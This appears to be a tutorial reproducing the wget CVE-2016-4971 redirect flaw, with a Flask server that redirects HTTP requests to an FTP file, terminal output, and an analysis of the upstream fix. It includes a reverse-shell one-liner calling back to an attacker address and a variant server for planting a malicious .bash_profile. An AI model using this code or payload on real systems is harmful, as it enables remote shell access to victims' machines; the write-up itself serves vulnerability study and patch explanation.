wget is a tool for non-interactively downloading files from the network; it supports HTTP, HTTPS, and FTP, the three most common TCP/IP-based protocols.
The vulnerability (CVE-2016-4971) occurs when an HTTP server redirects a request to an FTP URL: by default wget trusts the HTTP server and follows the redirected FTP URL directly, without re-validating it or sanitizing the name of the downloaded file. If an attacker supplies a malicious URL, such a redirect can be abused to drop a file with an attacker-controlled name and attacker-controlled content into the victim's current directory.
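Schematically (attacker.example is just a placeholder host for illustration), the exchange looks like this: the victim asks for a harmless file over HTTP, and the attacker's server answers with a 302 redirect whose Location header points at an FTP URL, which wget then follows:
GET /noharm.txt HTTP/1.1
Host: attacker.example

HTTP/1.1 302 FOUND
Location: ftp://attacker.example/harm.txt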
| Recommended environment | | Notes |
|---|---|---|
| Operating system | Ubuntu 16.04 | Architecture: 64-bit |
| Vulnerable software | wget | Version: 1.17.1 |
| Required software | vsftpd | Version: 3.0.3 |
First, install an FTP server:
$ sudo apt-get install vsftpd
Edit its configuration file /etc/vsftpd.conf so that anonymous users can also log in:
# Allow anonymous FTP? (Disabled by default).
anonymous_enable=YES
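Restart the service so the configuration change takes effect (assuming vsftpd was installed as a systemd service from the Ubuntu package, as above):
$ sudo systemctl restart vsftpd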
Next, we need an HTTP service; here we use Flask:
$ sudo pip install flask
Create two files, noharm.txt and harm.txt. The former is the benign file we will request; the latter is the malicious file the request will be redirected to:
$ ls
harm.txt httpServer.py noharm.txt
$ cat noharm.txt
"hello world"
$ cat harm.txt
"you've been hacked"
$ sudo cp harm.txt /srv/ftp
$ sudo python httpServer.py
* Running on http://0.0.0.0:80/ (Press CTRL+C to quit)
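As an optional sanity check (not part of the original walkthrough), you can confirm from another shell that the anonymous FTP share really serves harm.txt before moving on:
$ wget -q -O - ftp://127.0.0.1/harm.txt
"you've been hacked"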
The code of httpServer.py is as follows:
#!/usr/bin/env python
from flask import Flask, redirect

app = Flask(__name__)

@app.route("/noharm.txt")
def test():
    # Answer the request for the benign file with a 302 redirect to the malicious FTP URL
    return redirect("ftp://127.0.0.1/harm.txt")

if __name__ == "__main__":
    app.run(host="0.0.0.0", port=80)
Next, in another shell (remember to switch to a different directory), run the following commands:
$ ls | grep harm
$ wget --version | head -n1
GNU Wget 1.17.1 built on linux-gnu.
$ wget 0.0.0.0/noharm.txt
--2018-01-29 15:30:35-- http://0.0.0.0/noharm.txt
Connecting to 0.0.0.0:80... connected.
HTTP request sent, awaiting response... 302 FOUND
Location: ftp://127.0.0.1/harm.txt [following]
--2018-01-29 15:30:35-- ftp://127.0.0.1/harm.txt
=> ‘noharm.txt’
Connecting to 127.0.0.1:21... connected.
Logging in as anonymous ... Logged in!
==> SYST ... done. ==> PWD ... done.
==> TYPE I ... done. ==> CWD not needed.
==> SIZE harm.txt ... 21
==> PASV ... done. ==> RETR harm.txt ... done.
Length: 21 (unauthoritative)
noharm.txt 100%[==============================================>] 21 --.-KB/s in 0s
2018-01-29 15:30:35 (108 KB/s) - ‘noharm.txt’ saved [21]
$ ls | grep harm
noharm.txt
$ cat noharm.txt
"you've been hacked"
We can see that the redirect did happen: the downloaded content is that of the redirected file (harm.txt), but the file is still saved under the originally requested name (noharm.txt), so the file-name issue does not show up at all.
It appears that, although the system's wget reports version 1.17.1, it has most likely already been patched. Let's build and install the original, unpatched release from source:
$ sudo apt-get install libneon27-gnutls-dev
$ wget https://ftp.gnu.org/gnu/wget/wget-1.17.1.tar.gz
$ tar zxvf wget-1.17.1.tar.gz
$ cd wget-1.17.1
$ ./configure
$ make && sudo make install
Now issue the request again:
$ wget 0.0.0.0/noharm.txt
--2018-01-29 16:32:15-- http://0.0.0.0/noharm.txt
Connecting to 0.0.0.0:80... connected.
HTTP request sent, awaiting response... 302 FOUND
Location: ftp://127.0.0.1/harm.txt [following]
--2018-01-29 16:32:15-- ftp://127.0.0.1/harm.txt
=> ‘harm.txt’
Connecting to 127.0.0.1:21... connected.
Logging in as anonymous ... Logged in!
==> SYST ... done. ==> PWD ... done.
==> TYPE I ... done. ==> CWD not needed.
==> SIZE harm.txt ... 21
==> PASV ... done. ==> RETR harm.txt ... done.
Length: 21 (unauthoritative)
harm.txt 100%[==============================================>] 21 --.-KB/s in 0s
2018-01-29 16:32:15 (3.41 MB/s) - ‘harm.txt’ saved [21]
$ cat harm.txt
"you've been hacked"
Bingo! This time the file is saved as harm.txt instead of being renamed to the originally requested file name.
The references demonstrate an attack targeting .bash_profile. As we know, .bash_profile is executed when a user logs in to Linux and is typically used to set environment variables. If that file is malicious, for example if it contains a payload such as bash -i >& /dev/tcp/xxx.xxx.xxx.xxx/9980 0>&1, executing it hands a shell back to the attacker.
If someone runs a wget request from their home directory and that directory does not yet contain a .bash_profile, then by exploiting this vulnerability the attacker can drop a malicious .bash_profile into that home directory. The next time the user logs in, the malicious code is executed and the attacker obtains a shell.
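As a rough sketch of that scenario (assuming the same local Flask/vsftpd setup as above; the route name and file layout are placeholders, not taken from the referenced material), the attacker's HTTP server only needs to change the redirect target so that a vulnerable wget derives the local file name .bash_profile from the redirected URL:
#!/usr/bin/env python
# Hypothetical variant of httpServer.py for the .bash_profile attack.
# The anonymous FTP root would hold a file named .bash_profile containing a
# reverse-shell payload such as: bash -i >& /dev/tcp/xxx.xxx.xxx.xxx/9980 0>&1
from flask import Flask, redirect

app = Flask(__name__)

@app.route("/noharm.txt")
def lure():
    # A vulnerable wget takes the local file name from the redirected URL,
    # so the download is saved as ".bash_profile" in the victim's current directory.
    return redirect("ftp://127.0.0.1/.bash_profile")

if __name__ == "__main__":
    app.run(host="0.0.0.0", port=80)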
Finally, let's look at the upstream commit that fixes this vulnerability (shown with git show, restricted to src/ftp.c):
$ git show e996e322ffd42aaa051602da182d03178d0f13e1 -- src/ftp.c | cat
commit e996e322ffd42aaa051602da182d03178d0f13e1
Author: Giuseppe Scrivano <gscrivan@redhat.com>
Date: Mon Jun 6 21:20:24 2016 +0200
ftp: understand --trust-server-names on a HTTP->FTP redirect
If not --trust-server-names is used, FTP will also get the destination
file name from the original url specified by the user instead of the
redirected url. Closes CVE-2016-4971.
* src/ftp.c (ftp_get_listing): Add argument original_url.
(getftp): Likewise.
(ftp_loop_internal): Likewise. Use original_url to generate the
file name if --trust-server-names is not provided.
(ftp_retrieve_glob): Likewise.
(ftp_loop): Likewise.
Signed-off-by: Giuseppe Scrivano <gscrivan@redhat.com>
diff --git a/src/ftp.c b/src/ftp.c
index cc90c3d..88a9777 100644
--- a/src/ftp.c
+++ b/src/ftp.c
@@ -236,7 +236,7 @@ print_length (wgint size, wgint start, bool authoritative)
logputs (LOG_VERBOSE, !authoritative ? _(" (unauthoritative)\n") : "\n");
}
-static uerr_t ftp_get_listing (struct url *, ccon *, struct fileinfo **);
+static uerr_t ftp_get_listing (struct url *, struct url *, ccon *, struct fileinfo **);
static uerr_t
get_ftp_greeting(int csock, ccon *con)
@@ -315,7 +315,8 @@ init_control_ssl_connection (int csock, struct url *u, bool *using_control_secur
and closes the control connection in case of error. If warc_tmp
is non-NULL, the downloaded data will be written there as well. */
static uerr_t
-getftp (struct url *u, wgint passed_expected_bytes, wgint *qtyread,
+getftp (struct url *u, struct url *original_url,
+ wgint passed_expected_bytes, wgint *qtyread,
wgint restval, ccon *con, int count, wgint *last_expected_bytes,
FILE *warc_tmp)
{
@@ -1188,7 +1189,7 @@ Error in server response, closing control connection.\n"));
{
bool exists = false;
struct fileinfo *f;
- uerr_t _res = ftp_get_listing (u, con, &f);
+ uerr_t _res = ftp_get_listing (u, original_url, con, &f);
/* Set the DO_RETR command flag again, because it gets unset when
calling ftp_get_listing() and would otherwise cause an assertion
failure earlier on when this function gets repeatedly called
@@ -1779,8 +1780,8 @@ exit_error:
This loop either gets commands from con, or (if ON_YOUR_OWN is
set), makes them up to retrieve the file given by the URL. */
static uerr_t
-ftp_loop_internal (struct url *u, struct fileinfo *f, ccon *con, char **local_file,
- bool force_full_retrieve)
+ftp_loop_internal (struct url *u, struct url *original_url, struct fileinfo *f,
+ ccon *con, char **local_file, bool force_full_retrieve)
{
int count, orig_lp;
wgint restval, len = 0, qtyread = 0;
@@ -1805,7 +1806,7 @@ ftp_loop_internal (struct url *u, struct fileinfo *f, ccon *con, char **local_fi
{
/* URL-derived file. Consider "-O file" name. */
xfree (con->target);
- con->target = url_file_name (u, NULL);
+ con->target = url_file_name (opt.trustservernames || !original_url ? u : original_url, NULL);
if (!opt.output_document)
locf = con->target;
else
@@ -1923,8 +1924,8 @@ ftp_loop_internal (struct url *u, struct fileinfo *f, ccon *con, char **local_fi
/* If we are working on a WARC record, getftp should also write
to the warc_tmp file. */
- err = getftp (u, len, &qtyread, restval, con, count, &last_expected_bytes,
- warc_tmp);
+ err = getftp (u, original_url, len, &qtyread, restval, con, count,
+ &last_expected_bytes, warc_tmp);
if (con->csock == -1)
con->st &= ~DONE_CWD;
@@ -2092,7 +2093,8 @@ Removing file due to --delete-after in ftp_loop_internal():\n"));
/* Return the directory listing in a reusable format. The directory
is specifed in u->dir. */
static uerr_t
-ftp_get_listing (struct url *u, ccon *con, struct fileinfo **f)
+ftp_get_listing (struct url *u, struct url *original_url, ccon *con,
+ struct fileinfo **f)
{
uerr_t err;
char *uf; /* url file name */
@@ -2113,7 +2115,7 @@ ftp_get_listing (struct url *u, ccon *con, struct fileinfo **f)
con->target = xstrdup (lf);
xfree (lf);
- err = ftp_loop_internal (u, NULL, con, NULL, false);
+ err = ftp_loop_internal (u, original_url, NULL, con, NULL, false);
lf = xstrdup (con->target);
xfree (con->target);
con->target = old_target;
@@ -2136,8 +2138,9 @@ ftp_get_listing (struct url *u, ccon *con, struct fileinfo **f)
return err;
}
-static uerr_t ftp_retrieve_dirs (struct url *, struct fileinfo *, ccon *);
-static uerr_t ftp_retrieve_glob (struct url *, ccon *, int);
+static uerr_t ftp_retrieve_dirs (struct url *, struct url *,
+ struct fileinfo *, ccon *);
+static uerr_t ftp_retrieve_glob (struct url *, struct url *, ccon *, int);
static struct fileinfo *delelement (struct fileinfo *, struct fileinfo **);
static void freefileinfo (struct fileinfo *f);
@@ -2149,7 +2152,8 @@ static void freefileinfo (struct fileinfo *f);
If opt.recursive is set, after all files have been retrieved,
ftp_retrieve_dirs will be called to retrieve the directories. */
static uerr_t
-ftp_retrieve_list (struct url *u, struct fileinfo *f, ccon *con)
+ftp_retrieve_list (struct url *u, struct url *original_url,
+ struct fileinfo *f, ccon *con)
{
static int depth = 0;
uerr_t err;
@@ -2310,7 +2314,10 @@ Already have correct symlink %s -> %s\n\n"),
else /* opt.retr_symlinks */
{
if (dlthis)
- err = ftp_loop_internal (u, f, con, NULL, force_full_retrieve);
+ {
+ err = ftp_loop_internal (u, original_url, f, con, NULL,
+ force_full_retrieve);
+ }
} /* opt.retr_symlinks */
break;
case FT_DIRECTORY:
@@ -2321,7 +2328,10 @@ Already have correct symlink %s -> %s\n\n"),
case FT_PLAINFILE:
/* Call the retrieve loop. */
if (dlthis)
- err = ftp_loop_internal (u, f, con, NULL, force_full_retrieve);
+ {
+ err = ftp_loop_internal (u, original_url, f, con, NULL,
+ force_full_retrieve);
+ }
break;
case FT_UNKNOWN:
logprintf (LOG_NOTQUIET, _("%s: unknown/unsupported file type.\n"),
@@ -2386,7 +2396,7 @@ Already have correct symlink %s -> %s\n\n"),
/* We do not want to call ftp_retrieve_dirs here */
if (opt.recursive &&
!(opt.reclevel != INFINITE_RECURSION && depth >= opt.reclevel))
- err = ftp_retrieve_dirs (u, orig, con);
+ err = ftp_retrieve_dirs (u, original_url, orig, con);
else if (opt.recursive)
DEBUGP ((_("Will not retrieve dirs since depth is %d (max %d).\n"),
depth, opt.reclevel));
@@ -2399,7 +2409,8 @@ Already have correct symlink %s -> %s\n\n"),
ftp_retrieve_glob on each directory entry. The function knows
about excluded directories. */
static uerr_t
-ftp_retrieve_dirs (struct url *u, struct fileinfo *f, ccon *con)
+ftp_retrieve_dirs (struct url *u, struct url *original_url,
+ struct fileinfo *f, ccon *con)
{
char *container = NULL;
int container_size = 0;
@@ -2449,7 +2460,7 @@ Not descending to %s as it is excluded/not-included.\n"),
odir = xstrdup (u->dir); /* because url_set_dir will free
u->dir. */
url_set_dir (u, newdir);
- ftp_retrieve_glob (u, con, GLOB_GETALL);
+ ftp_retrieve_glob (u, original_url, con, GLOB_GETALL);
url_set_dir (u, odir);
xfree (odir);
@@ -2508,14 +2519,15 @@ is_invalid_entry (struct fileinfo *f)
GLOB_GLOBALL, use globbing; if it's GLOB_GETALL, download the whole
directory. */
static uerr_t
-ftp_retrieve_glob (struct url *u, ccon *con, int action)
+ftp_retrieve_glob (struct url *u, struct url *original_url,
+ ccon *con, int action)
{
struct fileinfo *f, *start;
uerr_t res;
con->cmd |= LEAVE_PENDING;
- res = ftp_get_listing (u, con, &start);
+ res = ftp_get_listing (u, original_url, con, &start);
if (res != RETROK)
return res;
/* First: weed out that do not conform the global rules given in
@@ -2611,7 +2623,7 @@ ftp_retrieve_glob (struct url *u, ccon *con, int action)
if (start)
{
/* Just get everything. */
- res = ftp_retrieve_list (u, start, con);
+ res = ftp_retrieve_list (u, original_url, start, con);
}
else
{
@@ -2627,7 +2639,7 @@ ftp_retrieve_glob (struct url *u, ccon *con, int action)
{
/* Let's try retrieving it anyway. */
con->st |= ON_YOUR_OWN;
- res = ftp_loop_internal (u, NULL, con, NULL, false);
+ res = ftp_loop_internal (u, original_url, NULL, con, NULL, false);
return res;
}
@@ -2647,8 +2659,8 @@ ftp_retrieve_glob (struct url *u, ccon *con, int action)
of URL. Inherently, its capabilities are limited on what can be
encoded into a URL. */
uerr_t
-ftp_loop (struct url *u, char **local_file, int *dt, struct url *proxy,
- bool recursive, bool glob)
+ftp_loop (struct url *u, struct url *original_url, char **local_file, int *dt,
+ struct url *proxy, bool recursive, bool glob)
{
ccon con; /* FTP connection */
uerr_t res;
@@ -2669,16 +2681,17 @@ ftp_loop (struct url *u, char **local_file, int *dt, struct url *proxy,
if (!*u->file && !recursive)
{
struct fileinfo *f;
- res = ftp_get_listing (u, &con, &f);
+ res = ftp_get_listing (u, original_url, &con, &f);
if (res == RETROK)
{
if (opt.htmlify && !opt.spider)
{
+ struct url *url_file = opt.trustservernames ? u : original_url;
char *filename = (opt.output_document
? xstrdup (opt.output_document)
: (con.target ? xstrdup (con.target)
- : url_file_name (u, NULL)));
+ : url_file_name (url_file, NULL)));
res = ftp_index (filename, u, f);
if (res == FTPOK && opt.verbose)
{
@@ -2723,11 +2736,13 @@ ftp_loop (struct url *u, char **local_file, int *dt, struct url *proxy,
/* ftp_retrieve_glob is a catch-all function that gets called
if we need globbing, time-stamping, recursion or preserve
permissions. Its third argument is just what we really need. */
- res = ftp_retrieve_glob (u, &con,
+ res = ftp_retrieve_glob (u, original_url, &con,
ispattern ? GLOB_GLOBALL : GLOB_GETONE);
}
else
- res = ftp_loop_internal (u, NULL, &con, local_file, false);
+ {
+ res = ftp_loop_internal (u, original_url, NULL, &con, local_file, false);
+ }
}
if (res == FTPOK)
res = RETROK;
Looking at the patch, the main changes are in two places. The first is in ftp_loop_internal(), which now checks both whether the --trust-server-names option was used and whether a redirect occurred (i.e. whether original_url is set):
con->target = url_file_name (opt.trustservernames || !original_url ? u : original_url, NULL);
The second is in ftp_loop(), which applies the same logic:
struct url *url_file = opt.trustservernames ? u : original_url;
After the change, unless --trust-server-names is given, the file name from the original URL is used by default instead of the one from the redirected URL, which resolves the issue.
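As a closing check (a sketch of the expected behaviour after the fix, not output captured in this article), a patched wget lets the two behaviours be compared directly: without the option the original file name wins, while --trust-server-names restores the old behaviour of trusting the redirected URL:
$ wget 0.0.0.0/noharm.txt                        # saved as noharm.txt
$ wget --trust-server-names 0.0.0.0/noharm.txt   # saved as harm.txt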